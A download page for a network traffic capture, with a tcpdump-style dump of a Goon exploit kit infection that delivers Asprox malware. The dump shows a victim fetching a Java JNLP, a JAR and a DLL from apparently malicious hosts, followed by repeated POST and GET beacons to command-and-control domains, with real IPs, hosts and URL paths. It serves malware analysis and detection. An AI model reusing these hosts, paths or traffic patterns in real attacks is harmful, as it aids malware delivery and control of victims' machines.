Text Example

Goon EK Exploit Kit Delivers Asprox Malware Java PCAP file download traffic sample

Download Attachments

  • 1 pcap 10
    Date added: May 23, 2019 9:35 pm | Added by: admin | File size: 615 KB | Downloads: 36

2014-02-13 08:30:38.307221 IP 192.168.204.164.50160 > 109.163.239.243.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:30:38.307546 IP 192.168.204.164.50160 > 109.163.239.243.80: Flags [P.], seq 1:297, ack 1, win 64240, length 296: HTTP: GET /libz29.64/jquery/ HTTP/1.1
GET /libz29.64/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: milk-mass.com
Cache-Control: no-cache

2014-02-13 08:30:38.307551 IP 109.163.239.243.80 > 192.168.204.164.50160: Flags [.], ack 297, win 64240, length 0

2014-02-13 08:30:38.464814 IP 109.163.239.243.80 > 192.168.204.164.50160: Flags [P.], seq 1:1461, ack 297, win 64240, length 1460: HTTP: HTTP/1.1 200 OK

2014-02-13 08:30:42.572662 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:30:42.765890 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [P.], seq 1:271, ack 1, win 64240, length 270: HTTP: GET /viewer/updater.jnlp HTTP/1.1
GET /viewer/updater.jnlp HTTP/1.1
accept-encoding: gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-02-13 08:30:42.765932 IP 217.160.26.3.80 > 192.168.204.164.50161: Flags [.], ack 271, win 64240, length 0

2014-02-13 08:30:43.070694 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [.], ack 792, win 63449, length 0
2014-02-13 08:30:44.150297 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [P.], seq 271:595, ack 792, win 63449, length 324: HTTP: GET /viewer/updater.jar HTTP/1.1
GET /viewer/updater.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


2014-02-13 08:30:44.333020 IP 192.168.204.164.50162 > 217.160.26.3.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:30:44.336915 IP 192.168.204.164.50162 > 217.160.26.3.80: Flags [P.], seq 1:283, ack 1, win 64240, length 282: HTTP: GET /viewer/updater.jar HTTP/1.1
GET /viewer/updater.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-02-13 08:30:44.336991 IP 217.160.26.3.80 > 192.168.204.164.50162: Flags [.], ack 283, win 64240, length 0

2014-02-13 08:31:27.786595 IP 192.168.204.164.49158 > 109.163.239.243.80: Flags [P.], seq 1:189, ack 1, win 64240, length 188: HTTP: GET /w56/soft32.dll HTTP/1.1
GET /w56/soft32.dll HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: milk-mass.com
Cache-Control: no-cache

2014-02-13 08:31:27.786703 IP 109.163.239.243.80 > 192.168.204.164.49158: Flags [.], ack 189, win 64240, length 0

2014-02-13 08:31:32.689988 IP 192.168.204.164.49159 > 78.60.70.213.80: Flags [.], ack 1, win 64240, length 0
IP 192.168.204.164.49159 > 78.60.70.213.80: Flags [P.], seq 1:464, ack 1, win 64240, length 463: HTTP: GET /b/eve/8c2e883fee499f51086fec65 HTTP/1.1
GET /b/eve/8c2e883fee499f51086fec65 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: cioco-froll.com
Connection: Keep-Alive

2014-02-13 08:31:32.690233 IP 78.60.70.213.80 > 192.168.204.164.49159: Flags [.], ack 464, win 64240, length 0

2014-02-13 08:32:25.717940 IP 192.168.204.164.49160 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:32:25.718286 IP 192.168.204.164.49160 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/opt/D6F3CC1258C05EEB3AA74985 HTTP/1.1
POST /b/opt/D6F3CC1258C05EEB3AA74985 HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

[186-byte binary request body, not printable]

2014-02-13 08:32:25.718296 IP 109.86.37.97.80 > 192.168.204.164.49160: Flags [.], ack 455, win 64240, length 0

2014-02-13 08:32:41.749080 IP 192.168.204.164.49161 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:32:41.749446 IP 192.168.204.164.49161 > 109.86.37.97.80: Flags [P.], seq 1:208, ack 1, win 64240, length 207: HTTP: GET /b/letr/036923DD1C1D3D157E7A2A7B HTTP/1.1
GET /b/letr/036923DD1C1D3D157E7A2A7B HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Cache-Control: no-cache

2014-02-13 08:32:41.749550 IP 109.86.37.97.80 > 192.168.204.164.49161: Flags [.], ack 208, win 64240, length 0

2014-02-13 08:32:42.267199 IP 109.86.37.97.80 > 192.168.204.164.49161: Flags [FP.], seq 1:349, ack 208, win 64240, length 348: HTTP: HTTP/1.1 200 OK

2014-02-13 08:32:42.459428 IP 192.168.204.164.49162 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/opt/4D04D207457A2CFB271D3B95 HTTP/1.1
POST /b/opt/4D04D207457A2CFB271D3B95 HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

[186-byte binary request body, not printable]

2014-02-13 08:32:59.167203 IP 192.168.204.164.49163 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:32:59.167750 IP 192.168.204.164.49163 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/req/F8D2498366494C6D042E5B03 HTTP/1.1
POST /b/req/F8D2498366494C6D042E5B03 HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

[186-byte binary request body, not printable]

2014-02-13 08:32:59.167759 IP 109.86.37.97.80 > 192.168.204.164.49163: Flags [.], ack 455, win 64240, length 0

2014-02-13 08:33:00.025635 IP 192.168.204.164.49164 > 89.109.26.81.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:33:00.025893 IP 192.168.204.164.49164 > 89.109.26.81.80: Flags [P.], seq 1:464, ack 1, win 64240, length 463: HTTP: GET /b/eve/4745276d25223003a2badb35 HTTP/1.1
GET /b/eve/4745276d25223003a2badb35 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: cioco-froll.com
Connection: Keep-Alive

2014-02-13 08:33:00.025988 IP 89.109.26.81.80 > 192.168.204.164.49164: Flags [.], ack 464, win 64240, length 0

2014-02-13 08:33:41.675286 IP 192.168.204.164.49166 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
2014-02-13 08:33:41.675292 IP 192.168.204.164.49166 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/req/977D94BF7D6485321F03925C HTTP/1.1
POST /b/req/977D94BF7D6485321F03925C HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache
